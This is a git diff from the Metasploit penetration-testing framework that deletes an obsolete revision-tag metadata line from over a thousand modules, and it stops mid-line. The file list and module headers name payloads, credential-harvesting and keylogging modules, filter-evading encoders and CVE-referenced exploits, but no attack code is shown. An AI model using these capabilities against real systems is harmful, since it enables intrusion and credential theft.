modules/payloads/stagers/osx/x64/bind_tcp.rb | 1 - modules/payloads/stagers/osx/x64/reverse_tcp.rb | 1 - modules/payloads/stagers/osx/x86/bind_tcp.rb | 1 - modules/payloads/stagers/osx/x86/reverse_tcp.rb | 1 - modules/payloads/stagers/php/bind_tcp.rb | 1 - modules/payloads/stagers/php/bind_tcp_ipv6.rb | 1 - modules/payloads/stagers/php/reverse_tcp.rb | 1 - modules/payloads/stagers/windows/bind_ipv6_tcp.rb | 1 - modules/payloads/stagers/windows/bind_nonx_tcp.rb | 1 - modules/payloads/stagers/windows/bind_tcp.rb | 1 - modules/payloads/stagers/windows/findtag_ord.rb | 1 - modules/payloads/stagers/windows/reverse_http.rb | 1 - modules/payloads/stagers/windows/reverse_https.rb | 1 - modules/payloads/stagers/windows/reverse_ipv6_http.rb | 1 - modules/payloads/stagers/windows/reverse_ipv6_https.rb | 1 - modules/payloads/stagers/windows/reverse_ipv6_tcp.rb | 1 - modules/payloads/stagers/windows/reverse_nonx_tcp.rb | 1 - modules/payloads/stagers/windows/reverse_ord_tcp.rb | 1 - modules/payloads/stagers/windows/reverse_tcp.rb | 1 - modules/payloads/stagers/windows/reverse_tcp_allports.rb | 1 - modules/payloads/stagers/windows/reverse_tcp_dns.rb | 1 - modules/payloads/stagers/windows/x64/bind_tcp.rb | 1 - modules/payloads/stagers/windows/x64/reverse_tcp.rb | 1 - modules/payloads/stages/bsd/x86/shell.rb | 1 - modules/payloads/stages/bsdi/x86/shell.rb | 1 - modules/payloads/stages/java/meterpreter.rb | 1 - modules/payloads/stages/java/shell.rb | 1 - modules/payloads/stages/linux/x64/shell.rb | 1 - modules/payloads/stages/linux/x86/meterpreter.rb | 1 - modules/payloads/stages/linux/x86/shell.rb | 1 - modules/payloads/stages/netware/shell.rb | 1 - modules/payloads/stages/osx/armle/execute.rb | 1 - modules/payloads/stages/osx/armle/shell.rb | 1 - modules/payloads/stages/osx/ppc/shell.rb | 1 - modules/payloads/stages/osx/x64/dupandexecve.rb | 1 - modules/payloads/stages/osx/x86/bundleinject.rb | 1 - modules/payloads/stages/osx/x86/isight.rb | 1 - modules/payloads/stages/osx/x86/vforkshell.rb | 1 - modules/payloads/stages/php/meterpreter.rb | 1 - modules/payloads/stages/windows/dllinject.rb | 1 - modules/payloads/stages/windows/meterpreter.rb | 1 - modules/payloads/stages/windows/patchupdllinject.rb | 1 - modules/payloads/stages/windows/patchupmeterpreter.rb | 1 - modules/payloads/stages/windows/shell.rb | 1 - modules/payloads/stages/windows/upexec.rb | 1 - modules/payloads/stages/windows/vncinject.rb | 1 - modules/payloads/stages/windows/x64/meterpreter.rb | 1 - modules/payloads/stages/windows/x64/shell.rb | 1 - modules/payloads/stages/windows/x64/vncinject.rb | 1 - modules/post/aix/hashdump.rb | 1 - modules/post/cisco/gather/enum_cisco.rb | 1 - modules/post/linux/gather/checkvm.rb | 1 - modules/post/linux/gather/enum_network.rb | 1 - modules/post/linux/gather/enum_system.rb | 1 - modules/post/linux/gather/enum_users_history.rb | 1 - modules/post/linux/gather/hashdump.rb | 1 - modules/post/multi/gather/apple_ios_backup.rb | 1 - modules/post/multi/gather/dns_bruteforce.rb | 1 - modules/post/multi/gather/dns_reverse_lookup.rb | 1 - modules/post/multi/gather/dns_srv_lookup.rb | 1 - modules/post/multi/gather/enum_vbox.rb | 1 - modules/post/multi/gather/env.rb | 1 - modules/post/multi/gather/filezilla_client_cred.rb | 1 - modules/post/multi/gather/find_vmx.rb | 1 - modules/post/multi/gather/firefox_creds.rb | 1 - modules/post/multi/gather/multi_command.rb | 1 - modules/post/multi/gather/pidgin_cred.rb | 1 - modules/post/multi/gather/ping_sweep.rb | 1 - modules/post/multi/gather/run_console_rc_file.rb | 1 - modules/post/multi/gather/skype_enum.rb | 1 - modules/post/multi/gather/ssh_creds.rb | 1 - modules/post/multi/general/close.rb | 1 - modules/post/multi/general/execute.rb | 1 - modules/post/multi/manage/multi_post.rb | 1 - modules/post/multi/manage/sudo.rb | 1 - modules/post/multi/manage/system_session.rb | 1 - modules/post/osx/gather/enum_osx.rb | 1 - modules/post/osx/gather/hashdump.rb | 1 - modules/post/solaris/gather/checkvm.rb | 1 - modules/post/solaris/gather/enum_packages.rb | 1 - modules/post/solaris/gather/enum_services.rb | 1 - modules/post/solaris/gather/hashdump.rb | 1 - modules/post/windows/capture/keylog_recorder.rb | 1 - modules/post/windows/capture/lockout_keylogger.rb | 1 - modules/post/windows/escalate/bypassuac.rb | 1 - modules/post/windows/escalate/getsystem.rb | 1 - modules/post/windows/escalate/ms10_073_kbdlayout.rb | 1 - modules/post/windows/escalate/ms10_092_schelevator.rb | 1 - modules/post/windows/escalate/net_runtime_modify.rb | 1 - modules/post/windows/escalate/screen_unlock.rb | 1 - modules/post/windows/escalate/service_permissions.rb | 1 - modules/post/windows/gather/arp_scanner.rb | 1 - modules/post/windows/gather/bitcoin_jacker.rb | 1 - modules/post/windows/gather/cachedump.rb | 1 - modules/post/windows/gather/credentials/coreftp.rb | 1 - modules/post/windows/gather/credentials/credential_collector.rb | 1 - modules/post/windows/gather/credentials/dyndns.rb | 1 - modules/post/windows/gather/credentials/enum_cred_store.rb | 1 - modules/post/windows/gather/credentials/enum_picasa_pwds.rb | 1 - modules/post/windows/gather/credentials/epo_sql.rb | 1 - modules/post/windows/gather/credentials/filezilla_server.rb | 1 - modules/post/windows/gather/credentials/flashfxp.rb | 1 - modules/post/windows/gather/credentials/ftpnavigator.rb | 1 - modules/post/windows/gather/credentials/idm.rb | 1 - modules/post/windows/gather/credentials/imail.rb | 1 - modules/post/windows/gather/credentials/imvu.rb | 1 - modules/post/windows/gather/credentials/meebo.rb | 1 - modules/post/windows/gather/credentials/mremote.rb | 1 - modules/post/windows/gather/credentials/nimbuzz.rb | 1 - modules/post/windows/gather/credentials/outlook.rb | 1 - modules/post/windows/gather/credentials/smartftp.rb | 1 - modules/post/windows/gather/credentials/total_commander.rb | 1 - modules/post/windows/gather/credentials/trillian.rb | 1 - modules/post/windows/gather/credentials/vnc.rb | 1 - modules/post/windows/gather/credentials/windows_autologin.rb | 1 - modules/post/windows/gather/credentials/winscp.rb | 1 - modules/post/windows/gather/credentials/wsftp_client.rb | 1 - modules/post/windows/gather/dumplinks.rb | 1 - modules/post/windows/gather/enum_applications.rb | 1 - modules/post/windows/gather/enum_chrome.rb | 1 - modules/post/windows/gather/enum_devices.rb | 1 - modules/post/windows/gather/enum_dirperms.rb | 1 - modules/post/windows/gather/enum_domain.rb | 1 - modules/post/windows/gather/enum_domain_group_users.rb | 1 - modules/post/windows/gather/enum_domain_tokens.rb | 1 - modules/post/windows/gather/enum_hostfile.rb | 1 - modules/post/windows/gather/enum_logged_on_users.rb | 1 - modules/post/windows/gather/enum_ms_product_keys.rb | 1 - modules/post/windows/gather/enum_powershell_env.rb | 1 - modules/post/windows/gather/enum_proxy.rb | 1 - modules/post/windows/gather/enum_services.rb | 1 - modules/post/windows/gather/enum_shares.rb | 1 - modules/post/windows/gather/enum_snmp.rb | 1 - modules/post/windows/gather/enum_termserv.rb | 1 - modules/post/windows/gather/enum_tokens.rb | 1 - modules/post/windows/gather/forensics/enum_drives.rb | 1 - modules/post/windows/gather/forensics/imager.rb | 1 - modules/post/windows/gather/forensics/nbd_server.rb | 1 - modules/post/windows/gather/hashdump.rb | 1 - modules/post/windows/gather/memory_grep.rb | 1 - modules/post/windows/gather/resolve_sid.rb | 1 - modules/post/windows/gather/reverse_lookup.rb | 1 - modules/post/windows/gather/screen_spy.rb | 1 - modules/post/windows/gather/smart_hashdump.rb | 1 - modules/post/windows/gather/tcpnetstat.rb | 1 - modules/post/windows/gather/usb_history.rb | 1 - modules/post/windows/gather/wmic_command.rb | 1 - modules/post/windows/manage/add_user_domain.rb | 1 - modules/post/windows/manage/autoroute.rb | 1 - modules/post/windows/manage/clone_proxy_settings.rb | 1 - modules/post/windows/manage/delete_user.rb | 1 - modules/post/windows/manage/enable_rdp.rb | 1 - modules/post/windows/manage/inject_ca.rb | 1 - modules/post/windows/manage/inject_host.rb | 1 - modules/post/windows/manage/migrate.rb | 1 - modules/post/windows/manage/multi_meterpreter_inject.rb | 1 - modules/post/windows/manage/nbd_server.rb | 1 - modules/post/windows/manage/payload_inject.rb | 1 - modules/post/windows/manage/persistence.rb | 1 - modules/post/windows/manage/powershell/exec_powershell.rb | 1 - modules/post/windows/manage/pxexploit.rb | 1 - modules/post/windows/manage/remove_ca.rb | 1 - modules/post/windows/manage/remove_host.rb | 1 - modules/post/windows/manage/run_as.rb | 1 - modules/post/windows/manage/smart_migrate.rb | 1 - modules/post/windows/recon/computer_browser_discovery.rb | 1 - modules/post/windows/recon/resolve_ip.rb | 1 - modules/post/windows/wlan/wlan_bss_list.rb | 1 - modules/post/windows/wlan/wlan_current_connection.rb | 1 - modules/post/windows/wlan/wlan_disconnect.rb | 1 - modules/post/windows/wlan/wlan_profile.rb | 1 - 1142 files changed, 1147 deletions(-) diff --git a/modules/encoders/cmd/generic_sh.rb b/modules/encoders/cmd/generic_sh.rb index 9fbd09b86f..ab43078de3 100644 --- a/modules/encoders/cmd/generic_sh.rb +++ b/modules/encoders/cmd/generic_sh.rb @@ -17,7 +17,6 @@ class Metasploit3 < Msf::Encoder def initialize super( 'Name' => 'Generic Shell Variable Substitution Command Encoder', - 'Version' => '$Revision$', 'Description' => %q{ This encoder uses standard Bourne shell variable substitution tricks to avoid commonly restricted characters. diff --git a/modules/encoders/cmd/ifs.rb b/modules/encoders/cmd/ifs.rb index 08d4ba9b6e..758712adec 100644 --- a/modules/encoders/cmd/ifs.rb +++ b/modules/encoders/cmd/ifs.rb @@ -18,7 +18,6 @@ class Metasploit3 < Msf::Encoder def initialize super( 'Name' => 'Generic ${IFS} Substitution Command Encoder', - 'Version' => '$Revision$', 'Description' => %q{ This encoder uses standard Bourne shell variable substitution to avoid spaces without being overly fancy. diff --git a/modules/encoders/cmd/printf_php_mq.rb b/modules/encoders/cmd/printf_php_mq.rb index b391d595bf..2334278d42 100644 --- a/modules/encoders/cmd/printf_php_mq.rb +++ b/modules/encoders/cmd/printf_php_mq.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Encoder def initialize super( 'Name' => 'printf(1) via PHP magic_quotes Utility Command Encoder', - 'Version' => '$Revision$', 'Description' => %q{ This encoder uses the printf(1) utility to avoid restricted characters. Some shell variable substituion may also be used diff --git a/modules/encoders/generic/none.rb b/modules/encoders/generic/none.rb index 3558d1c466..c8a0acc3b7 100644 --- a/modules/encoders/generic/none.rb +++ b/modules/encoders/generic/none.rb @@ -14,7 +14,6 @@ class Metasploit3 < Msf::Encoder def initialize super( 'Name' => 'The "none" Encoder', - 'Version' => '$Revision$', 'Description' => %q{ This "encoder" does not transform the payload in any way. }, diff --git a/modules/encoders/mipsbe/longxor.rb b/modules/encoders/mipsbe/longxor.rb index f0d3712471..6e01f655ba 100644 --- a/modules/encoders/mipsbe/longxor.rb +++ b/modules/encoders/mipsbe/longxor.rb @@ -15,7 +15,6 @@ class Metasploit3 < Msf::Encoder::Xor def initialize super( 'Name' => 'XOR Encoder', - 'Version' => '$Revision$', 'Description' => %q{ Mips Web server exploit friendly xor encoder }, diff --git a/modules/encoders/mipsle/longxor.rb b/modules/encoders/mipsle/longxor.rb index 8f8e60655f..2e7377f6a4 100644 --- a/modules/encoders/mipsle/longxor.rb +++ b/modules/encoders/mipsle/longxor.rb @@ -15,7 +15,6 @@ class Metasploit3 < Msf::Encoder::Xor def initialize super( 'Name' => 'XOR Encoder', - 'Version' => '$Revision$', 'Description' => %q{ Mips Web server exploit friendly xor encoder }, diff --git a/modules/encoders/php/base64.rb b/modules/encoders/php/base64.rb index 60e2190b6d..481dd52ef7 100644 --- a/modules/encoders/php/base64.rb +++ b/modules/encoders/php/base64.rb @@ -15,7 +15,6 @@ class Metasploit3 < Msf::Encoder def initialize super( 'Name' => 'PHP Base64 Encoder', - 'Version' => '$Revision$', 'Description' => %q{ This encoder returns a base64 string encapsulated in eval(base64_decode()), increasing the size by a bit more than diff --git a/modules/encoders/ppc/longxor.rb b/modules/encoders/ppc/longxor.rb index d5c899f658..42f346b2cf 100644 --- a/modules/encoders/ppc/longxor.rb +++ b/modules/encoders/ppc/longxor.rb @@ -14,7 +14,6 @@ class Metasploit3 < Msf::Encoder::Xor def initialize super( 'Name' => 'PPC LongXOR Encoder', - 'Version' => '$Revision$', 'Description' => %q{ This encoder is ghandi's PPC dword xor encoder with some size tweaks by HDM. diff --git a/modules/encoders/ppc/longxor_tag.rb b/modules/encoders/ppc/longxor_tag.rb index 430cb6bdb6..8f59331223 100644 --- a/modules/encoders/ppc/longxor_tag.rb +++ b/modules/encoders/ppc/longxor_tag.rb @@ -14,7 +14,6 @@ class Metasploit3 < Msf::Encoder::Xor def initialize super( 'Name' => 'PPC LongXOR Encoder', - 'Version' => '$Revision$', 'Description' => %q{ This encoder is ghandi's PPC dword xor encoder but uses a tag-based terminator rather than a length. diff --git a/modules/encoders/sparc/longxor_tag.rb b/modules/encoders/sparc/longxor_tag.rb index e24dd39dc9..f57b3c24ab 100644 --- a/modules/encoders/sparc/longxor_tag.rb +++ b/modules/encoders/sparc/longxor_tag.rb @@ -14,7 +14,6 @@ class Metasploit3 < Msf::Encoder::XorAdditiveFeedback def initialize super( 'Name' => 'SPARC DWORD XOR Encoder', - 'Version' => '$Revision$', 'Description' => %q{ This encoder is optyx's 48-byte SPARC encoder with some tweaks. }, diff --git a/modules/encoders/x64/xor.rb b/modules/encoders/x64/xor.rb index e09dcc5c4b..7903b97075 100644 --- a/modules/encoders/x64/xor.rb +++ b/modules/encoders/x64/xor.rb @@ -14,7 +14,6 @@ class Metasploit3 < Msf::Encoder::Xor def initialize super( 'Name' => 'XOR Encoder', - 'Version' => '$Revision$', 'Description' => 'An x64 XOR encoder. Uses an 8 byte key and takes advantage of x64 relative addressing.', 'Author' => [ 'sf' ], 'Arch' => ARCH_X86_64, diff --git a/modules/encoders/x86/alpha_mixed.rb b/modules/encoders/x86/alpha_mixed.rb index a6d3d0c2e1..50da763ac4 100644 --- a/modules/encoders/x86/alpha_mixed.rb +++ b/modules/encoders/x86/alpha_mixed.rb @@ -14,7 +14,6 @@ class Metasploit3 < Msf::Encoder::Alphanum def initialize super( 'Name' => "Alpha2 Alphanumeric Mixedcase Encoder", - 'Version' => '$Revision$', 'Description' => %q{ Encodes payloads as alphanumeric mixedcase text. This encoder uses SkyLined's Alpha2 encoding suite. diff --git a/modules/encoders/x86/alpha_upper.rb b/modules/encoders/x86/alpha_upper.rb index ba6556cb0c..96580245d3 100644 --- a/modules/encoders/x86/alpha_upper.rb +++ b/modules/encoders/x86/alpha_upper.rb @@ -17,7 +17,6 @@ class Metasploit3 < Msf::Encoder::Alphanum def initialize super( 'Name' => "Alpha2 Alphanumeric Uppercase Encoder", - 'Version' => '$Revision$', 'Description' => %q{ Encodes payloads as alphanumeric uppercase text. This encoder uses SkyLined's Alpha2 encoding suite. diff --git a/modules/encoders/x86/avoid_underscore_tolower.rb b/modules/encoders/x86/avoid_underscore_tolower.rb index 24e3cd0293..83f5e5b15b 100644 --- a/modules/encoders/x86/avoid_underscore_tolower.rb +++ b/modules/encoders/x86/avoid_underscore_tolower.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Encoder def initialize super( 'Name' => 'Avoid underscore/tolower', - 'Version' => '$Revision$', 'Description' => %q{ Underscore/tolower Safe Encoder used to exploit CVE-2012-2329. It is a modified version of the 'Avoid UTF8/tolower' encoder by skape. Please check diff --git a/modules/encoders/x86/avoid_utf8_tolower.rb b/modules/encoders/x86/avoid_utf8_tolower.rb index 21051e1fc0..32987db23d 100644 --- a/modules/encoders/x86/avoid_utf8_tolower.rb +++ b/modules/encoders/x86/avoid_utf8_tolower.rb @@ -113,7 +113,6 @@ class Metasploit3 < Msf::Encoder def initialize super( 'Name' => 'Avoid UTF8/tolower', - 'Version' => '$Revision$', 'Description' => 'UTF8 Safe, tolower Safe Encoder', 'Author' => 'skape', 'Arch' => ARCH_X86, diff --git a/modules/encoders/x86/call4_dword_xor.rb b/modules/encoders/x86/call4_dword_xor.rb index 82072ac060..e66ae57ec0 100644 --- a/modules/encoders/x86/call4_dword_xor.rb +++ b/modules/encoders/x86/call4_dword_xor.rb @@ -14,7 +14,6 @@ class Metasploit3 < Msf::Encoder::Xor def initialize super( 'Name' => 'Call+4 Dword XOR Encoder', - 'Version' => '$Revision$', 'Description' => 'Call+4 Dword XOR Encoder', 'Author' => [ 'hdm', 'spoonm' ], 'Arch' => ARCH_X86, diff --git a/modules/encoders/x86/context_cpuid.rb b/modules/encoders/x86/context_cpuid.rb index 2355659456..4e305f93ce 100644 --- a/modules/encoders/x86/context_cpuid.rb +++ b/modules/encoders/x86/context_cpuid.rb @@ -18,7 +18,6 @@ class Metasploit3 < Msf::Encoder::XorAdditiveFeedback def initialize super( 'Name' => 'CPUID-based Context Keyed Payload Encoder', - 'Version' => '$Revision$', 'Description' => %q{ This is a Context-Keyed Payload Encoder based on CPUID and Shikata Ga Nai. }, diff --git a/modules/encoders/x86/context_stat.rb b/modules/encoders/x86/context_stat.rb index 0b70208f52..e8c4282835 100644 --- a/modules/encoders/x86/context_stat.rb +++ b/modules/encoders/x86/context_stat.rb @@ -18,7 +18,6 @@ class Metasploit3 < Msf::Encoder::XorAdditiveFeedback def initialize super( 'Name' => 'stat(2)-based Context Keyed Payload Encoder', - 'Version' => '$Revision$', 'Description' => %q{ This is a Context-Keyed Payload Encoder based on stat(2) and Shikata Ga Nai. diff --git a/modules/encoders/x86/context_time.rb b/modules/encoders/x86/context_time.rb index 60f5447ab0..c59eac19c6 100644 --- a/modules/encoders/x86/context_time.rb +++ b/modules/encoders/x86/context_time.rb @@ -18,7 +18,6 @@ class Metasploit3 < Msf::Encoder::XorAdditiveFeedback def initialize super( 'Name' => 'time(2)-based Context Keyed Payload Encoder', - 'Version' => '$Revision$', 'Description' => %q{ This is a Context-Keyed Payload Encoder based on time(2) and Shikata Ga Nai. diff --git a/modules/encoders/x86/countdown.rb b/modules/encoders/x86/countdown.rb index cbc6b5f0a3..d20785c9dc 100644 --- a/modules/encoders/x86/countdown.rb +++ b/modules/encoders/x86/countdown.rb @@ -14,7 +14,6 @@ class Metasploit3 < Msf::Encoder::Xor def initialize super( 'Name' => 'Single-byte XOR Countdown Encoder', - 'Version' => '$Revision$', 'Description' => %q{ This encoder uses the length of the payload as a position-dependent encoder key to produce a small decoder stub. diff --git a/modules/encoders/x86/fnstenv_mov.rb b/modules/encoders/x86/fnstenv_mov.rb index c82a691b0e..65d79d05a7 100644 --- a/modules/encoders/x86/fnstenv_mov.rb +++ b/modules/encoders/x86/fnstenv_mov.rb @@ -14,7 +14,6 @@ class Metasploit3 < Msf::Encoder::Xor def initialize super( 'Name' => 'Variable-length Fnstenv/mov Dword XOR Encoder', - 'Version' => '$Revision$', 'Description' => %q{ This encoder uses a variable-length mov equivalent instruction with fnstenv for getip. diff --git a/modules/encoders/x86/jmp_call_additive.rb b/modules/encoders/x86/jmp_call_additive.rb index e3aa456051..470d98d567 100644 --- a/modules/encoders/x86/jmp_call_additive.rb +++ b/modules/encoders/x86/jmp_call_additive.rb @@ -17,7 +17,6 @@ class Metasploit3 < Msf::Encoder::XorAdditiveFeedback def initialize super( 'Name' => 'Jump/Call XOR Additive Feedback Encoder', - 'Version' => '$Revision$', 'Description' => 'Jump/Call XOR Additive Feedback', 'Author' => 'skape', 'Arch' => ARCH_X86, diff --git a/modules/encoders/x86/nonalpha.rb b/modules/encoders/x86/nonalpha.rb index d550eec8e5..5c63e4cd16 100644 --- a/modules/encoders/x86/nonalpha.rb +++ b/modules/encoders/x86/nonalpha.rb @@ -17,7 +17,6 @@ class Metasploit3 < Msf::Encoder::NonAlpha def initialize super( 'Name' => "Non-Alpha Encoder", - 'Version' => '$Revision$', 'Description' => %q{ Encodes payloads as non-alpha based bytes. This allows payloads to bypass both toupper() and tolower() calls, diff --git a/modules/encoders/x86/nonupper.rb b/modules/encoders/x86/nonupper.rb index 6ca447487b..6c7ae7bb1c 100644 --- a/modules/encoders/x86/nonupper.rb +++ b/modules/encoders/x86/nonupper.rb @@ -17,7 +17,6 @@ class Metasploit3 < Msf::Encoder::NonUpper def initialize super( 'Name' => "Non-Upper Encoder", - 'Version' => '$Revision$', 'Description' => %q{ Encodes payloads as non-alpha based bytes. This allows payloads to bypass tolower() calls, but will fail isalpha(). diff --git a/modules/encoders/x86/shikata_ga_nai.rb b/modules/encoders/x86/shikata_ga_nai.rb index 6f5f31b349..6cfeec98ea 100644 --- a/modules/encoders/x86/shikata_ga_nai.rb +++ b/modules/encoders/x86/shikata_ga_nai.rb @@ -19,7 +19,6 @@ class Metasploit3 < Msf::Encoder::XorAdditiveFeedback def initialize super( 'Name' => 'Polymorphic XOR Additive Feedback Encoder', - 'Version' => '$Revision$', 'Description' => %q{ This encoder implements a polymorphic XOR additive feedback encoder. The decoder stub is generated based on dynamic instruction diff --git a/modules/encoders/x86/single_static_bit.rb b/modules/encoders/x86/single_static_bit.rb index 7d0810d986..569cc9db39 100644 --- a/modules/encoders/x86/single_static_bit.rb +++ b/modules/encoders/x86/single_static_bit.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Encoder def initialize super( 'Name' => 'Single Static Bit', - 'Version' => '$Revision$', 'Description' => 'Static value for specific bit', 'Author' => 'jduck', 'Arch' => ARCH_X86, diff --git a/modules/encoders/x86/unicode_mixed.rb b/modules/encoders/x86/unicode_mixed.rb index 8b4c37cb1d..43f754d7cb 100644 --- a/modules/encoders/x86/unicode_mixed.rb +++ b/modules/encoders/x86/unicode_mixed.rb @@ -17,7 +17,6 @@ class Metasploit3 < Msf::Encoder::Alphanum def initialize super( 'Name' => "Alpha2 Alphanumeric Unicode Mixedcase Encoder", - 'Version' => '$Revision$', 'Description' => %q{ Encodes payloads as unicode-safe mixedcase text. This encoder uses SkyLined's Alpha2 encoding suite. diff --git a/modules/encoders/x86/unicode_upper.rb b/modules/encoders/x86/unicode_upper.rb index db109901e1..65e05a0f69 100644 --- a/modules/encoders/x86/unicode_upper.rb +++ b/modules/encoders/x86/unicode_upper.rb @@ -17,7 +17,6 @@ class Metasploit3 < Msf::Encoder::Alphanum def initialize super( 'Name' => "Alpha2 Alphanumeric Unicode Uppercase Encoder", - 'Version' => '$Revision$', 'Description' => %q{ Encodes payload as unicode-safe uppercase text. This encoder uses SkyLined's Alpha2 encoding suite. diff --git a/modules/exploits/aix/rpc_cmsd_opcode21.rb b/modules/exploits/aix/rpc_cmsd_opcode21.rb index 36ea136c53..11020201af 100644 --- a/modules/exploits/aix/rpc_cmsd_opcode21.rb +++ b/modules/exploits/aix/rpc_cmsd_opcode21.rb @@ -32,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Rodrigo Rubira Branco (BSDaemon)', 'jduck', ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-3699' ], diff --git a/modules/exploits/aix/rpc_ttdbserverd_realpath.rb b/modules/exploits/aix/rpc_ttdbserverd_realpath.rb index 98a9ba43df..cf61ce9ea8 100644 --- a/modules/exploits/aix/rpc_ttdbserverd_realpath.rb +++ b/modules/exploits/aix/rpc_ttdbserverd_realpath.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Ramon de C Valle', 'Adriano Lima ', ], - 'Version' => '$Revision$', 'Platform' => [ 'aix' ], 'References' => [ diff --git a/modules/exploits/apple_ios/browser/safari_libtiff.rb b/modules/exploits/apple_ios/browser/safari_libtiff.rb index 5b391b90b1..d9cb3f2ce8 100644 --- a/modules/exploits/apple_ios/browser/safari_libtiff.rb +++ b/modules/exploits/apple_ios/browser/safari_libtiff.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => ['hdm', 'kf'], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-3459'], diff --git a/modules/exploits/apple_ios/email/mobilemail_libtiff.rb b/modules/exploits/apple_ios/email/mobilemail_libtiff.rb index 5c8cb487a1..8a819a630d 100644 --- a/modules/exploits/apple_ios/email/mobilemail_libtiff.rb +++ b/modules/exploits/apple_ios/email/mobilemail_libtiff.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => ['hdm', 'kf'], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-3459'], diff --git a/modules/exploits/bsdi/softcart/mercantec_softcart.rb b/modules/exploits/bsdi/softcart/mercantec_softcart.rb index ff5758e3b7..c7055290a9 100644 --- a/modules/exploits/bsdi/softcart/mercantec_softcart.rb +++ b/modules/exploits/bsdi/softcart/mercantec_softcart.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote 4.00b. }, 'Author' => [ 'skape', 'trew' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-2221'], diff --git a/modules/exploits/dialup/multi/login/manyargs.rb b/modules/exploits/dialup/multi/login/manyargs.rb index b3ba6482e1..f335e604f4 100644 --- a/modules/exploits/dialup/multi/login/manyargs.rb +++ b/modules/exploits/dialup/multi/login/manyargs.rb @@ -29,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2002-10/0014.html'], [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2004-12/0404.html'], ], - 'Version' => '$Revision$', 'Author' => [ 'I)ruid', diff --git a/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb b/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb index 09e1330eb7..cb7d6181e5 100644 --- a/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb +++ b/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote execute arbitrary code. }, 'Author' => [ 'jduck' ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2010-4221'], diff --git a/modules/exploits/freebsd/samba/trans2open.rb b/modules/exploits/freebsd/samba/trans2open.rb index f182de1732..033b0fa0cc 100644 --- a/modules/exploits/freebsd/samba/trans2open.rb +++ b/modules/exploits/freebsd/samba/trans2open.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm', 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2003-0201' ], diff --git a/modules/exploits/freebsd/tacacs/xtacacsd_report.rb b/modules/exploits/freebsd/tacacs/xtacacsd_report.rb index 9205302b7c..d9ff42c886 100644 --- a/modules/exploits/freebsd/tacacs/xtacacsd_report.rb +++ b/modules/exploits/freebsd/tacacs/xtacacsd_report.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote username, an attacker may be able to execute arbitrary code. }, 'Author' => 'MC', - 'Version' => '$Revision$', 'References' => [ ['CVE', '2008-7232'], diff --git a/modules/exploits/hpux/lpd/cleanup_exec.rb b/modules/exploits/hpux/lpd/cleanup_exec.rb index bd4c725aa4..b7e7307e38 100644 --- a/modules/exploits/hpux/lpd/cleanup_exec.rb +++ b/modules/exploits/hpux/lpd/cleanup_exec.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote HPSBUX0208-213. }, 'Author' => [ 'hdm' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2002-1473'], diff --git a/modules/exploits/irix/lpd/tagprinter_exec.rb b/modules/exploits/irix/lpd/tagprinter_exec.rb index 3f4c91b9d5..51bceebb53 100644 --- a/modules/exploits/irix/lpd/tagprinter_exec.rb +++ b/modules/exploits/irix/lpd/tagprinter_exec.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'optyx', 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2001-0800'], diff --git a/modules/exploits/linux/ftp/proftp_sreplace.rb b/modules/exploits/linux/ftp/proftp_sreplace.rb index 8ca7aa1326..6639ede3bb 100644 --- a/modules/exploits/linux/ftp/proftp_sreplace.rb +++ b/modules/exploits/linux/ftp/proftp_sreplace.rb @@ -52,7 +52,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Evgeny Legerov ', # original .pm version (VulnDisco) 'jduck' # Metasploit 3.x port ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-5815' ], diff --git a/modules/exploits/linux/ftp/proftp_telnet_iac.rb b/modules/exploits/linux/ftp/proftp_telnet_iac.rb index a88cfa4b2b..4ae4c0525b 100644 --- a/modules/exploits/linux/ftp/proftp_telnet_iac.rb +++ b/modules/exploits/linux/ftp/proftp_telnet_iac.rb @@ -43,7 +43,6 @@ class Metasploit3 < Msf::Exploit::Remote and could allow exploitation in semi-reasonable amount of time. }, 'Author' => [ 'jduck' ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2010-4221'], diff --git a/modules/exploits/linux/games/ut2004_secure.rb b/modules/exploits/linux/games/ut2004_secure.rb index 049d3da217..8b357d9f39 100644 --- a/modules/exploits/linux/games/ut2004_secure.rb +++ b/modules/exploits/linux/games/ut2004_secure.rb @@ -31,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'onetwo' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-0608'], diff --git a/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb b/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb index 7ebe8502c4..dd80800e1f 100644 --- 